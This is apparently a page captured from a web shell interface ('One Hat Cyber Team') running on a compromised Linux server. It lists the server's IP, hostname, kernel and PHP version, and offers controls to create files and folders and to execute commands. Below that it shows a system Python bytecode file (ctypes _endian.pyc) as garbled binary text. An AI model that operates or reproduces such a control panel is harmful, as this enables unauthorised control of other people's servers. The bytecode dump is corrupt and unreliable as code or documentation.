⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.236
Server IP:
104.21.112.1
Server:
Linux vmi2315822.contaboserver.net 5.15.0-134-generic #145-Ubuntu SMP Wed Feb 12 20:08:39 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.3.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
lib
/
python3.10
/
ctypes
/
__pycache__
/
View File Name :
_endian.cpython-310.pyc
o �*�g� � @ s� d dl Z d dlT ee�Zdd� ZG dd� dee��Ze jdkr/dZ eZ G d d � d eed�ZdS e jdkrDd Z eZG dd� deed�Z dS ed��)� N)�*c C sH t | t�r t| t�S t| t�rt| j�| j S t| t �r| S t d| ��)z�Return the type with the 'other' byte order. Simple types like c_int and so on already have __ctype_be__ and __ctype_le__ attributes which contain the types, for more complicated types arrays and structures are supported. z+This type does not support other endian: %s)�hasattr� _OTHER_ENDIAN�getattr� isinstance�_array_type� _other_endian�_type_�_length_� issubclass� Structure� TypeError)�typ� r �%/usr/lib/python3.10/ctypes/_endian.pyr s r c s e Zd Z� fdd�Z� ZS )� _swapped_metac s^ |dkr&g }|D ]}|d }|d }|dd � }|� |t|�f| � q|}t� �||� d S )N�_fields_r � � )�appendr �super�__setattr__)�self�attrname�value�fields�desc�namer �rest�� __class__r r r s z_swapped_meta.__setattr__)�__name__� __module__�__qualname__r � __classcell__r r r r r s r �little�__ctype_be__c @ � e Zd ZdZdZdZdS )�BigEndianStructurez$Structure with big endian byte orderr N�r! r"